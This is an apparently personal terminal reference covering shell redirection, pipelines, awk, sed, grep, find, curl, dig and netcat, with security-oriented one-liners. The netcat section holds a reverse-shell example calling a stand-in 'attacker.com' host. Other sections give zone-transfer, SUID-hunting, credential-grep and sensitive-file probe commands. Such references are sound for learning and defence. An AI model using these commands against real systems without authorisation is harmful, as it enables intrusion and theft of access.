Terminal Power User: The Complete Reference

This document is your arsenal. Every command, pattern, and technique here is battle-tested. Master these and you’ll operate at the speed of thought.

Philosophy: The terminal is not a tool - it’s a language. Each command is a word, pipes are grammar, and one-liners are sentences. Fluency comes from daily use.

1. The Three Streams

Every process has three standard file descriptors. Understanding these is fundamental.

Stream   Number   Default    Purpose
stdin    0        Keyboard   Input to the program
stdout   1        Terminal   Normal output (results)
stderr   2        Terminal   Errors, warnings, diagnostics
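The separation is easy to verify with a throwaway function (`demo` is just an illustrative name) that writes one line to each stream, then routes them to different files:

```shell
# A throwaway function that writes one line to each stream
demo() {
    echo "to stdout"
    echo "to stderr" >&2
}

# Route each stream to its own file
demo > out.txt 2> err.txt

cat out.txt   # to stdout
cat err.txt   # to stderr
```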

1.1. Redirection Operators

# Redirect stdout to file (overwrite)
command > file.txt

# Redirect stdout to file (append)
command >> file.txt

# Redirect stderr to file
command 2> errors.txt

# Redirect stderr to stdout (merge streams)
command 2>&1

# Redirect both stdout and stderr to file
command &> all_output.txt        # Bash shorthand
command > file.txt 2>&1          # POSIX compatible

# Redirect both to /dev/null (silent execution)
command &>/dev/null

# Redirect stdin from file
command < input.txt

# Here-document (multi-line input)
command << 'EOF'
line 1
line 2
EOF

# Here-string (single-line input)
command <<< "input string"
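One subtlety worth a demo: redirections are processed left to right, which is why `2>&1` must come *after* the file redirection to merge both streams into the file. A minimal sketch (`gen` is a hypothetical helper defined inline):

```shell
gen() { echo out; echo err >&2; }

# stdout goes to the file first, then stderr is pointed at stdout's
# current target (the file): both lines land in both.txt
gen > both.txt 2>&1

# Reversed: stderr is pointed at stdout's OLD target (the terminal)
# BEFORE stdout is redirected, so only "out" reaches the file
gen 2>&1 > only_out.txt
```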

1.2. Practical Stream Examples

# Separate success and failure output
find /etc -name "*.conf" > found.txt 2> errors.txt

# Log everything with timestamps
./script.sh 2>&1 | while IFS= read -r line; do
    echo "$(date '+%Y-%m-%d %H:%M:%S') $line"
done | tee -a script.log

# Check if command succeeded (ignore output)
if command -v nmap &>/dev/null; then
    echo "nmap is installed"
fi

# Capture exit code AND output
output=$(command 2>&1)
exit_code=$?

2. Pipelines: The Unix Philosophy

Write programs that do one thing and do it well. Write programs to work together.
— Doug McIlroy

2.1. Pipeline Fundamentals

# Basic pipe: stdout of left → stdin of right
command1 | command2 | command3

# Named pipe (FIFO) for complex workflows
mkfifo /tmp/mypipe
command1 > /tmp/mypipe &
command2 < /tmp/mypipe

# Process substitution (treats command output as file)
diff <(command1) <(command2)

# Tee: split output to file AND continue pipeline
command | tee output.log | next_command

# Tee to multiple files
command | tee file1.txt file2.txt | next_command
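Process substitution (a bash/zsh feature, not plain POSIX sh) is easiest to see with two files that differ only in line order:

```shell
printf 'b\na\n' > left.txt
printf 'a\nb\n' > right.txt

# Each <(...) behaves like a temporary file holding the command's output
diff <(sort left.txt) <(sort right.txt) && echo "identical after sorting"
```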

2.2. Pipeline Patterns

# Count unique occurrences (THE classic pattern)
cat access.log | cut -d' ' -f1 | sort | uniq -c | sort -rn | head -20

# Same thing, more efficient (no useless cat)
cut -d' ' -f1 access.log | sort | uniq -c | sort -rn | head -20

# Filter → Transform → Aggregate
grep "ERROR" app.log | awk '{print $4}' | sort | uniq -c | sort -rn

# Real-time log monitoring with filtering
tail -f /var/log/syslog | grep --line-buffered "error" | while IFS= read -r line; do
    notify-send "Error detected" "$line"
done
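The count-and-rank idiom above, run against a three-line synthetic log (`access_demo.log` is a made-up file for illustration) so the output shape is obvious:

```shell
printf '1.1.1.1 GET /a\n2.2.2.2 GET /b\n1.1.1.1 GET /c\n' > access_demo.log

# 1.1.1.1 (count 2) ranks first, 2.2.2.2 (count 1) second
cut -d' ' -f1 access_demo.log | sort | uniq -c | sort -rn
```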

3. AWK: The Power Tool

AWK is not just a command - it’s a programming language optimized for text processing.

3.1. AWK Fundamentals

# Basic structure: pattern { action }
awk '/pattern/ { print $0 }' file

# Field separator (-F)
awk -F':' '{ print $1 }' /etc/passwd        # Split on colon
awk -F',' '{ print $2 }' data.csv           # Split on comma
awk -F'\t' '{ print $1, $3 }' data.tsv      # Split on tab

# Built-in variables
awk '{ print NR, NF, $0 }' file             # Line number, field count, line
awk 'END { print NR }' file                 # Total line count
awk '{ print $NF }' file                    # Last field
awk '{ print $(NF-1) }' file                # Second-to-last field

3.2. AWK Variables Reference

Variable    Description
$0          Entire current line
$1, $2...   Fields 1, 2, etc.
$NF         Last field
NF          Number of fields in current line
NR          Current line number (across all files)
FNR         Line number in current file
FS          Field separator (input)
OFS         Output field separator
RS          Record separator (default: newline)
ORS         Output record separator
FILENAME    Current filename
ARGC/ARGV   Argument count/array

3.3. AWK Patterns

# Regular expression match
awk 'tolower($0) ~ /error/ { print }' log.txt  # Case insensitive (/re/i is not valid awk)
awk '$3 ~ /^192\.168/ { print }' access.log # Field matches regex
awk '$3 !~ /^10\./ { print }' access.log    # Field doesn't match

# Comparison operators
awk '$3 > 100 { print }' data.txt           # Numeric comparison
awk '$1 == "admin" { print }' users.txt     # String equality
awk 'length($0) > 80 { print }' file        # Line length

# Range patterns (from...to)
awk '/START/,/END/ { print }' file          # Print between patterns
awk 'NR==5,NR==10 { print }' file           # Print lines 5-10

# BEGIN and END blocks
awk 'BEGIN { print "Header" } { print } END { print "Footer" }' file

3.4. AWK Programming

# Variables and arithmetic
awk '{ sum += $1 } END { print "Total:", sum }' numbers.txt
awk '{ sum += $1; count++ } END { print "Average:", sum/count }' numbers.txt

# Conditional statements
awk '{
    if ($3 > 100) {
        print $1, "HIGH"
    } else if ($3 > 50) {
        print $1, "MEDIUM"
    } else {
        print $1, "LOW"
    }
}' data.txt

# Ternary operator
awk '{ print $1, ($2 > 0 ? "positive" : "non-positive") }' numbers.txt

# Loops
awk '{
    for (i = 1; i <= NF; i++) {
        print "Field", i, ":", $i
    }
}' file

# Arrays (associative)
awk '{
    count[$1]++
}
END {
    for (key in count) {
        print key, count[key]
    }
}' access.log
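The associative-array counting pattern works on any stream. Here it is against inline data, with a trailing sort because awk's `for (key in count)` iteration order is unspecified:

```shell
printf 'alice\nbob\nalice\n' |
    awk '{ count[$1]++ } END { for (k in count) print k, count[k] }' |
    sort
# alice 2
# bob 1
```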

# Functions
awk '
function max(a, b) {
    return (a > b) ? a : b
}
{
    print max($1, $2)
}' numbers.txt

3.5. AWK One-Liners for Security

# Top 10 IPs by request count
awk '{print $1}' access.log | sort | uniq -c | sort -rn | head -10

# Failed SSH attempts by IP
awk '/Failed password/ {
    for(i=1;i<=NF;i++) if($i=="from") print $(i+1)
}' /var/log/auth.log | sort | uniq -c | sort -rn

# Bandwidth by IP (Apache combined log)
awk '{ip[$1]+=$10} END {for(i in ip) print ip[i], i}' access.log | sort -rn | head

# Extract all email addresses
awk '{
    for(i=1;i<=NF;i++) {
        if($i ~ /[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}/) {
            print $i
        }
    }
}' file

# Parse CSV with quoted fields (gawk-only: FPAT defines what a field looks like)
awk -v FPAT='[^,]*|"[^"]*"' '{ print $2 }' data.csv

# HTTP response code distribution
awk '{codes[$9]++} END {for(c in codes) print c, codes[c]}' access.log | sort

# Time-based analysis (requests per hour)
awk -F'[\\[:]' '{hour[$3]++} END {for(h in hour) print h":00", hour[h]}' access.log | sort

3.6. AWK Math Functions

# Built-in math
awk 'BEGIN {
    print sin(1)          # Sine
    print cos(1)          # Cosine
    print exp(1)          # e^x
    print log(10)         # Natural log
    print sqrt(16)        # Square root
    print int(3.7)        # Integer part
    print rand()          # Random 0-1
    srand()               # Seed random
}'

# Practical: calculate percentages
awk '{
    total += $1
    values[NR] = $1
}
END {
    for (i = 1; i <= NR; i++) {
        pct = (values[i] / total) * 100
        printf "%s: %.2f%%\n", values[i], pct
    }
}' numbers.txt
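Running the percentage calculation above against a tiny inline dataset (values 25 and 75) makes the store-then-report structure concrete:

```shell
printf '25\n75\n' | awk '{
    total += $1
    values[NR] = $1
}
END {
    for (i = 1; i <= NR; i++)
        printf "%s: %.2f%%\n", values[i], (values[i] / total) * 100
}'
# 25: 25.00%
# 75: 75.00%
```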

4. SED: Stream Editor

Sed transforms text - search, replace, delete, insert.

4.1. SED Fundamentals

# Basic substitution: s/old/new/
sed 's/foo/bar/' file              # First occurrence per line
sed 's/foo/bar/g' file             # All occurrences (global)
sed 's/foo/bar/gi' file            # Global, case-insensitive

# In-place editing
sed -i 's/foo/bar/g' file          # Modify file directly
sed -i.bak 's/foo/bar/g' file      # Backup to file.bak first

# Delete lines
sed '/pattern/d' file              # Delete matching lines
sed '5d' file                      # Delete line 5
sed '5,10d' file                   # Delete lines 5-10
sed '$d' file                      # Delete last line

# Print specific lines
sed -n '5p' file                   # Print line 5 only
sed -n '5,10p' file                # Print lines 5-10
sed -n '/pattern/p' file           # Print matching lines (like grep)
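First-match-only versus global substitution, shown on a pipe:

```shell
echo "foo foo foo" | sed 's/foo/bar/'    # bar foo foo
echo "foo foo foo" | sed 's/foo/bar/g'   # bar bar bar
```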

4.2. SED Advanced

# Multiple commands
sed -e 's/foo/bar/g' -e 's/baz/qux/g' file
sed 's/foo/bar/g; s/baz/qux/g' file

# Address ranges
sed '10,20s/foo/bar/g' file        # Only lines 10-20
sed '/start/,/end/s/foo/bar/g' file # Between patterns

# Capture groups
sed 's/\(.*\):\(.*\)/\2:\1/' file  # Swap around colon
sed -E 's/(.*):(.*)/\2:\1/' file   # Extended regex (cleaner)

# Insert and append
sed '3i\New line before 3' file   # Insert before line 3
sed '3a\New line after 3' file    # Append after line 3
sed '/pattern/i\Insert before pattern' file

# Transform (character mapping)
sed 'y/abc/ABC/' file              # Like tr: a→A, b→B, c→C

# Delete empty lines
sed '/^$/d' file

# Remove leading/trailing whitespace
sed 's/^[[:space:]]*//' file       # Leading
sed 's/[[:space:]]*$//' file       # Trailing
sed 's/^[[:space:]]*//;s/[[:space:]]*$//' file  # Both

4.3. SED One-Liners for Security

# Remove comments and empty lines
sed '/^#/d; /^$/d' config.conf

# Extract URLs from file
sed -n 's/.*\(https\?:\/\/[^"<>[:space:]]*\).*/\1/p' file

# Obfuscate IP addresses in logs
sed -E 's/([0-9]{1,3}\.){3}[0-9]{1,3}/X.X.X.X/g' access.log

# Replace sensitive data
sed 's/password=.*/password=REDACTED/g' config.log

# Fix line endings (DOS to Unix)
sed 's/\r$//' file

# Number lines (like nl or cat -n)
sed = file | sed 'N;s/\n/\t/'

# Reverse lines (like tac)
sed '1!G;h;$!d' file

4.4. Real-World Example: SSH authorized_keys Management

Managing ~/.ssh/authorized_keys with awk and sed - actual commands from a production session.

4.4.1. View Keys with Line Numbers

# List all keys with line numbers
awk '{print NR": "$0}' ~/.ssh/authorized_keys
Example Output
1: ssh-ed25519 AAAA...software-key... user@host
2:
3: sk-ssh-ed25519@openssh.com AAAA...yubikey-primary... user@yubikey
4: sk-ssh-ed25519@openssh.com AAAA...yubikey-secondary... user@yubikey-backup
5:

4.4.2. Delete Blank Lines

# Remove all empty lines
sed -i '/^$/d' ~/.ssh/authorized_keys

4.4.3. Insert Key at Top of File

# Insert new key at line 1 (top of file)
sed -i '1i ssh-ed25519 AAAA...key-content... user@host' ~/.ssh/authorized_keys

4.4.4. Replace Specific Line

# Replace line 2 with new content
sed -i '2s/.*/new-key-content-here/' ~/.ssh/authorized_keys

Delimiter Collision: If your replacement text contains /, use a different delimiter:

# WRONG - fails because key contains /
sed -i '2s/.*/ssh-ed25519 AAAA.../evanusmodestus@d000/' file

# CORRECT - use # as delimiter instead
sed -i '2s#.*#ssh-ed25519 AAAA...evanusmodestus@d000#' file
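Any punctuation character can follow `s`; sed treats whatever comes next as the delimiter. A quick sandbox check (the filename is arbitrary; note that BSD/macOS sed needs `-i ''` instead of bare `-i`):

```shell
echo "old" > delim_demo.txt

# '#' as delimiter lets the replacement contain slashes untouched
sed -i 's#old#path/with/slashes#' delim_demo.txt

cat delim_demo.txt   # path/with/slashes
```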

4.4.5. Append Key at End of File

# Append after the last line
sed -i '$a ssh-ed25519 AAAA... evanusmodestus@d000' ~/.ssh/authorized_keys

4.4.6. Combined Operations

# Delete blank lines AND insert at top in one command
sed -i -e '/^$/d' -e '1i ssh-ed25519 AAAA... evanusmodestus@d000' ~/.ssh/authorized_keys

# Verify result
awk '{print NR": "$0}' ~/.ssh/authorized_keys
Result After Operations
1: ssh-ed25519 AAAA...new-software-key... user@host
2: ssh-ed25519 AAAA...old-software-key... user@host
3: sk-ssh-ed25519@openssh.com AAAA...yubikey-primary... user@yubikey
4: sk-ssh-ed25519@openssh.com AAAA...yubikey-secondary... user@yubikey-backup

5. GREP: Pattern Matching

Grep finds patterns. Extended grep (egrep/grep -E) and Perl-compatible (grep -P) add power.

5.1. GREP Fundamentals

# Basic search
grep "pattern" file
grep -i "pattern" file             # Case insensitive
grep -v "pattern" file             # Invert (non-matching)
grep -c "pattern" file             # Count matches
grep -n "pattern" file             # Show line numbers
grep -l "pattern" *.txt            # Files containing match
grep -L "pattern" *.txt            # Files NOT containing match

# Recursive search
grep -r "pattern" /path            # Recursive
grep -rn "pattern" /path           # Recursive with line numbers
grep -rl "pattern" /path           # Just filenames

# Context
grep -A 3 "pattern" file           # 3 lines After
grep -B 3 "pattern" file           # 3 lines Before
grep -C 3 "pattern" file           # 3 lines Context (both)

5.2. GREP Extended Regex

# grep -E (or egrep)
grep -E "pattern1|pattern2" file   # OR
grep -E "^start" file              # Starts with
grep -E "end$" file                # Ends with
grep -E "^$" file                  # Empty lines
grep -E "^.{80,}$" file            # Lines > 80 chars
grep -E "[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}" file  # IP addresses
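Adding `-o` prints only the matched text, one match per line, which turns a matcher into an extractor:

```shell
echo "gateway 10.0.0.1, dns 8.8.8.8" |
    grep -oE "([0-9]{1,3}\.){3}[0-9]{1,3}"
# 10.0.0.1
# 8.8.8.8
```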

5.3. GREP Perl Regex (-P)

# Lookahead/lookbehind (Perl-compatible)
grep -P "(?<=password=)\w+" file   # Word after "password="
grep -P "(?<!not )error" file      # "error" not preceded by "not "
grep -P "\d{3}-\d{3}-\d{4}" file   # Phone numbers
grep -oP "(?<=src=\")[^\"]+(?=\")" file  # Extract src attributes

# Non-greedy matching
grep -oP "href=\".*?\"" file       # Shortest match

5.4. GREP for Security

# Find potential credentials
grep -rn "password\|passwd\|secret\|api[_-]key" /path

# Find IP addresses
grep -oE "([0-9]{1,3}\.){3}[0-9]{1,3}" file

# Find email addresses
grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" file

# Find private keys
grep -r "BEGIN.*PRIVATE KEY" /path

# Find encoded strings (base64-ish)
grep -oE "[A-Za-z0-9+/]{40,}={0,2}" file

# Search binary files
grep -a "pattern" binary_file      # Treat as text
strings binary_file | grep "pattern"  # Better approach

6. FIND: File Discovery

Find locates files by name, type, size, time, permissions, and more.

6.1. FIND Fundamentals

# By name
find /path -name "*.txt"           # Exact match (case sensitive)
find /path -iname "*.txt"          # Case insensitive
find /path -name "file*"           # Glob pattern

# By type
find /path -type f                 # Files only
find /path -type d                 # Directories only
find /path -type l                 # Symlinks only

# By size
find /path -size +100M             # Larger than 100MB
find /path -size -1k               # Smaller than 1KB
find /path -empty                  # Empty files/dirs

# By time (days)
find /path -mtime -1               # Modified within 1 day
find /path -mtime +30              # Modified more than 30 days ago
find /path -mmin -60               # Modified within 60 minutes
find /path -newer reference.txt    # Newer than reference file

# By permissions
find /path -perm 777               # Exact permissions
find /path -perm -u+x              # User executable
find /path -perm /u+x,g+x          # User OR group executable

# By owner
find /path -user root
find /path -group wheel
find /path -nouser                 # No valid user (orphaned)

6.2. FIND with Actions

# Execute command on each result
find /path -name "*.log" -exec rm {} \;           # Delete each
find /path -name "*.txt" -exec grep "pattern" {} \;  # Search each

# More efficient: batch execution
find /path -name "*.log" -exec rm {} +            # Delete in batches

# Delete (built-in, safer)
find /path -name "*.tmp" -delete

# Print with format
find /path -printf "%p %s %T+\n"   # Path, size, time

# Combine conditions
find /path -name "*.log" -size +10M -mtime +7     # AND (implicit)
find /path \( -name "*.txt" -o -name "*.md" \)    # OR
find /path ! -name "*.log"                        # NOT
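The grouping syntax is easy to get wrong (the parens must be escaped and surrounded by spaces), so here is a sandbox run (`find_demo` is a throwaway directory):

```shell
mkdir -p find_demo
touch find_demo/a.txt find_demo/b.md find_demo/c.log

find find_demo -type f \( -name "*.txt" -o -name "*.md" \) | sort
# find_demo/a.txt
# find_demo/b.md
```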

6.3. FIND for Security

# World-writable files (security risk)
find / -type f -perm -002 2>/dev/null

# SUID/SGID binaries (privilege escalation vectors)
find / -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null

# Files modified in last 24 hours (incident response)
find / -type f -mtime -1 2>/dev/null

# Files owned by nobody (suspicious)
find / -nouser -o -nogroup 2>/dev/null

# Find config files with passwords
find /etc -type f -exec grep -l "password" {} \; 2>/dev/null

# Large files (data exfil check)
find / -type f -size +100M 2>/dev/null

# Recently accessed files
find /home -type f -atime -1 2>/dev/null

7. XARGS: Build Command Lines

Xargs converts stdin into arguments. Essential for piping to commands that don’t read stdin.

7.1. XARGS Fundamentals

# Basic usage: stdin → arguments
echo "file1 file2 file3" | xargs rm
find . -name "*.tmp" | xargs rm

# Handle filenames with spaces (-0 with null delimiter)
find . -name "*.txt" -print0 | xargs -0 rm

# Limit arguments per command
echo "1 2 3 4 5 6" | xargs -n 2 echo
# Output:
# 1 2
# 3 4
# 5 6

# Placeholder for argument position
find . -name "*.txt" | xargs -I {} cp {} /backup/

# Parallel execution
find . -name "*.gz" | xargs -P 4 gunzip     # 4 parallel jobs

# Prompt before execution
echo "file1 file2" | xargs -p rm            # Asks y/n for each
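The `-print0`/`-0` pairing is what makes whitespace-safe pipelines work: each name travels as a NUL-terminated unit instead of being split on spaces (`xargs_demo` is a throwaway directory):

```shell
mkdir -p xargs_demo
touch "xargs_demo/has space.txt" xargs_demo/plain.txt

# Without -0, "has space.txt" would split into two bogus arguments;
# with it, each filename arrives intact, so we get exactly 2 lines
find xargs_demo -name "*.txt" -print0 | xargs -0 -n 1 echo | wc -l
```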

7.2. XARGS Patterns

# Find and grep (efficient)
find . -name "*.py" | xargs grep "import os"

# Batch rename (parsing ls breaks on filenames with spaces)
ls *.txt | xargs -I {} mv {} {}.bak
# Whitespace-safe alternative
printf '%s\0' *.txt | xargs -0 -I {} mv {} {}.bak

# Download multiple URLs
cat urls.txt | xargs -n 1 -P 5 curl -O      # 5 parallel downloads

# Kill processes by name
pgrep -f "python script.py" | xargs kill

# Run command for each line
cat hosts.txt | xargs -I {} ssh {} "uptime"

# Build complex commands
find . -name "*.c" | xargs -I {} sh -c 'gcc {} -o $(basename {} .c)'

8. CUT, TR, SORT, UNIQ: Text Processing

These small tools combine powerfully in pipelines.

8.1. CUT

# Extract fields (delimiter-based)
cut -d':' -f1 /etc/passwd          # First field (username)
cut -d':' -f1,3 /etc/passwd        # Fields 1 and 3
cut -d':' -f1-3 /etc/passwd        # Fields 1 through 3

# Extract characters
cut -c1-10 file                    # First 10 characters
cut -c5- file                      # From character 5 to end

# Different delimiter
cut -d',' -f2 data.csv             # CSV second column

8.2. TR (Translate)

# Character replacement
tr 'a-z' 'A-Z' < file              # Lowercase to uppercase
tr '[:lower:]' '[:upper:]' < file  # Same, POSIX class

# Delete characters
tr -d '0-9' < file                 # Remove all digits
tr -d '\r' < file                  # Remove carriage returns

# Squeeze repeated characters
tr -s ' ' < file                   # Multiple spaces → single space
tr -s '\n' < file                  # Multiple newlines → single

# Complement (inverse)
tr -cd '[:print:]' < file          # Keep only printable chars
tr -cd '0-9\n' < file              # Keep only digits and newlines

# ROT13 (CTF classic)
echo "secret" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
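ROT13 is its own inverse, which makes a nice sanity check (`rot13` here is a throwaway helper function):

```shell
rot13() { tr 'A-Za-z' 'N-ZA-Mn-za-m'; }

echo "attack at dawn" | rot13           # nggnpx ng qnja
echo "attack at dawn" | rot13 | rot13   # attack at dawn
```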

8.3. SORT

# Basic sort
sort file                          # Alphabetical
sort -r file                       # Reverse
sort -n file                       # Numeric
sort -h file                       # Human-readable (1K, 2M, 3G)

# Sort by field
sort -t':' -k3 -n /etc/passwd      # By UID (field 3, numeric)
sort -t',' -k2 data.csv            # CSV by second column

# Unique sort
sort -u file                       # Sort and deduplicate

# Random sort (shuffle)
sort -R file
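Field-based numeric sorting in action on inline CSV: `-t` sets the delimiter, `-k2` picks the column, and `-n` compares numerically so 9 sorts before 30:

```shell
printf 'bob,30\neve,9\nal,25\n' | sort -t',' -k2 -n
# eve,9
# al,25
# bob,30
```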

8.4. UNIQ

# Remove adjacent duplicates (MUST sort first)
sort file | uniq

# Count occurrences
sort file | uniq -c

# Only duplicates
sort file | uniq -d

# Only unique (non-duplicated)
sort file | uniq -u

# Ignore case
sort file | uniq -i

# THE classic combo: count and rank
cat access.log | cut -d' ' -f1 | sort | uniq -c | sort -rn | head -20

9. CURL: HTTP Swiss Army Knife

Curl does HTTP (and much more) from the command line.

9.1. CURL Fundamentals

# Basic GET
curl https://example.com

# Save output
curl -o output.html https://example.com
curl -O https://example.com/file.zip  # Keep original filename

# Follow redirects
curl -L https://example.com

# Show headers
curl -I https://example.com           # HEAD request (headers only)
curl -i https://example.com           # Include headers in output

# Verbose (debugging)
curl -v https://example.com

# Silent (no progress)
curl -s https://example.com

9.2. CURL HTTP Methods

# POST with data
curl -X POST -d "user=admin&pass=secret" https://example.com/login
curl -X POST -d '{"user":"admin"}' -H "Content-Type: application/json" https://api.example.com

# PUT
curl -X PUT -d "data" https://api.example.com/resource/1

# DELETE
curl -X DELETE https://api.example.com/resource/1

# Custom headers
curl -H "Authorization: Bearer TOKEN" https://api.example.com
curl -H "X-Custom: value" -H "Accept: application/json" https://api.example.com

# Upload file
curl -F "file=@/path/to/file.txt" https://example.com/upload
curl -T file.txt https://example.com/upload      # PUT upload

9.3. CURL for Security Testing

# Check for common files
curl -s -o /dev/null -w "%{http_code}" https://example.com/robots.txt
curl -s -o /dev/null -w "%{http_code}" https://example.com/.git/config
curl -s -o /dev/null -w "%{http_code}" https://example.com/wp-config.php.bak

# Test authentication
curl -u admin:password https://example.com/protected

# Cookie handling
curl -c cookies.txt https://example.com/login    # Save cookies
curl -b cookies.txt https://example.com/profile  # Use cookies

# User agent spoofing
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" https://example.com

# Proxy (Burp Suite)
curl -x http://127.0.0.1:8080 https://example.com

# Ignore certificate errors (testing only!)
curl -k https://self-signed.example.com

# Timing analysis
curl -o /dev/null -s -w "DNS: %{time_namelookup}s\nConnect: %{time_connect}s\nTTFB: %{time_starttransfer}s\nTotal: %{time_total}s\n" https://example.com

# Download with rate limit
curl --limit-rate 1M -O https://example.com/large.zip

10. DIG: DNS Interrogation

Dig queries DNS servers directly. Essential for recon and troubleshooting.

10.1. DIG Fundamentals

# Basic query (A record)
dig example.com

# Short output (just the answer)
dig +short example.com

# Specific record type
dig MX example.com
dig TXT example.com
dig NS example.com
dig AAAA example.com
dig ANY example.com                # All records (often blocked)

# Query specific server
dig @8.8.8.8 example.com
dig @1.1.1.1 example.com

# Reverse lookup
dig -x 8.8.8.8

10.2. DIG Advanced

# Trace resolution path
dig +trace example.com

# No recursion (ask root servers)
dig +norecurse example.com

# DNSSEC information
dig +dnssec example.com

# Zone transfer (if allowed)
dig @ns1.example.com example.com AXFR

# Check specific record with authority
dig +noadditional +noauthority example.com

# TCP instead of UDP
dig +tcp example.com

# Timing information
dig example.com | grep "Query time"

10.3. DIG for Security/Recon

# Enumerate subdomains via zone transfer
dig @ns1.target.com target.com AXFR

# Find mail servers
dig MX target.com +short

# Find SPF record (email security)
dig TXT target.com +short | grep spf

# Find DMARC policy
dig TXT _dmarc.target.com +short

# Check CAA (certificate authority restrictions)
dig CAA target.com +short

# Find all nameservers
dig NS target.com +short

# Check DNSSEC
dig +dnssec target.com

# Reverse DNS sweep
for i in {1..254}; do
    dig -x 192.168.1.$i +short
done

11. NETCAT (NC): Network Swiss Army Knife

Netcat reads and writes network connections. TCP/UDP, client/server, anything.

11.1. NC Fundamentals

# Connect to port (client)
nc example.com 80

# Listen on port (server)
nc -l 4444

# Listen and keep listening after disconnect
nc -lk 4444

# UDP mode
nc -u example.com 53

# Port scan
nc -zv example.com 20-25           # Scan ports 20-25
nc -zv example.com 80 443 8080     # Scan specific ports

# Timeout
nc -w 3 example.com 80             # 3 second timeout

11.2. NC Practical Uses

# Simple HTTP request
echo -e "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n" | nc example.com 80

# File transfer
# Receiver:
nc -l 4444 > received_file
# Sender:
nc target.com 4444 < file_to_send

# Chat between machines
# Machine A:
nc -l 4444
# Machine B:
nc machine-a.com 4444

# Reverse shell (CTF/pentesting)
# Attacker listens:
nc -lvp 4444
# Target connects back (-e requires ncat or nc.traditional; many nc builds omit it):
nc attacker.com 4444 -e /bin/bash

# Banner grabbing
echo "" | nc -v target.com 22      # SSH banner
echo "" | nc -v target.com 25      # SMTP banner

# Test if port is open
nc -zv target.com 443 && echo "Port 443 open"

12. Bash Loops and Arrays

12.1. Loops

# For loop (list)
for host in server1 server2 server3; do
    echo "Pinging $host"
    ping -c 1 "$host"
done

# For loop (range)
for i in {1..10}; do
    echo "Number: $i"
done

# For loop (C-style)
for ((i=0; i<10; i++)); do
    echo "Index: $i"
done

# For loop (command output - word-splits on whitespace; fine for simple names)
for file in $(find . -name "*.txt"); do
    echo "Processing: $file"
done

# While loop (-r preserves backslashes; IFS= keeps leading/trailing spaces)
while IFS= read -r line; do
    echo "Line: $line"
done < file.txt

# While with condition
count=0
while [ $count -lt 5 ]; do
    echo "Count: $count"
    ((count++))
done

# Until loop (opposite of while)
until ping -c 1 google.com &>/dev/null; do
    echo "Waiting for network..."
    sleep 1
done

# Infinite loop
while true; do
    # do something
    sleep 60
done

12.2. Arrays

# Declare array
declare -a hosts=("server1" "server2" "server3")

# Add element
hosts+=("server4")

# Access element
echo "${hosts[0]}"                 # First element
echo "${hosts[-1]}"                # Last element
echo "${hosts[@]}"                 # All elements
echo "${#hosts[@]}"                # Array length

# Loop over array
for host in "${hosts[@]}"; do
    echo "Host: $host"
done

# Loop with index
for i in "${!hosts[@]}"; do
    echo "Index $i: ${hosts[$i]}"
done

# Associative arrays (Bash 4+)
declare -A users
users["admin"]="password123"
users["guest"]="guest123"

for user in "${!users[@]}"; do
    echo "User: $user, Pass: ${users[$user]}"
done

# Array from command output
mapfile -t lines < file.txt
# or
IFS=$'\n' read -d '' -ra lines < file.txt
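A quick mapfile check (bash 4+; `-t` strips the trailing newline from each element, and arrays are zero-indexed):

```shell
printf 'one\ntwo\nthree\n' > lines_demo.txt

mapfile -t lines < lines_demo.txt
echo "${#lines[@]}"   # 3
echo "${lines[1]}"    # two
```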

12.3. Conditional Execution

# AND (&&) - run second only if first succeeds
mkdir /tmp/test && cd /tmp/test

# OR (||) - run second only if first fails
ping -c 1 host || echo "Host unreachable"

# Combine them (caution: "Failed" also runs if the first echo fails; prefer if/else when it matters)
command && echo "Success" || echo "Failed"

# If statement
if [ "$USER" = "root" ]; then
    echo "Running as root"
elif [ "$USER" = "admin" ]; then
    echo "Running as admin"
else
    echo "Running as $USER"
fi

# Test conditions
[ -f file ]      # File exists
[ -d dir ]       # Directory exists
[ -r file ]      # Readable
[ -w file ]      # Writable
[ -x file ]      # Executable
[ -z "$var" ]    # Variable is empty
[ -n "$var" ]    # Variable is not empty
[ "$a" = "$b" ]  # String equality
[ "$a" -eq "$b" ] # Numeric equality
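A few of these in action; note the quoting around variables, which keeps empty values from breaking the test syntax:

```shell
var=""
[ -z "$var" ] && echo "var is empty"        # fires

touch cond_demo.txt
[ -f cond_demo.txt ] && echo "file exists"  # fires
[ -x cond_demo.txt ] || echo "not executable"
```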

13. Power Combinations

These one-liners combine multiple tools for maximum effect.

13.1. Log Analysis

# Top 10 IPs with failed SSH logins
grep "Failed password" /var/log/auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -rn | head -10

# Requests per hour (Apache)
awk -F'[\\[:]' '{print $2":"$3}' access.log | sort | uniq -c | sort -rn

# Unique user agents
awk -F'"' '{print $6}' access.log | sort -u

# 404 errors with referring URLs
awk '$9 == 404 {print $11, $7}' access.log | sort | uniq -c | sort -rn

# Slow requests (>5 seconds)
awk '$NF > 5000000 {print $7, $NF/1000000"s"}' access.log | sort -t' ' -k2 -rn

# Real-time monitoring with color
tail -f access.log | awk '
    $9 >= 500 {print "\033[31m" $0 "\033[0m"; next}
    $9 >= 400 {print "\033[33m" $0 "\033[0m"; next}
    {print}'

13.2. Network Analysis

# All listening ports with process names (sub() strips the address, leaving the port;
# a sed 's/.*://' on the whole line would also eat the process info)
ss -tlnp | awk 'NR>1 {sub(/.*:/, "", $4); print $4, $NF}' | sort -n

# Established connections by remote IP
ss -tn | awk 'NR>1 {print $5}' | cut -d: -f1 | sort | uniq -c | sort -rn

# DNS queries from packet capture
tcpdump -r capture.pcap -n port 53 2>/dev/null | awk '{print $NF}' | sort | uniq -c | sort -rn

# HTTP hosts from packet capture
tcpdump -A -r capture.pcap port 80 2>/dev/null | grep -oE "Host: [^\r]+" | sort | uniq -c

# ARP table analysis
arp -a | awk '{print $2, $4}' | tr -d '()'

13.3. Security Scanning

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null | xargs -I {} ls -la {}

# World-writable directories
find / -type d -perm -002 2>/dev/null | grep -v proc

# Find files modified in last day
find / -type f -mtime -1 2>/dev/null | grep -v "proc\|sys" | head -50

# Check for unauthorized SSH keys
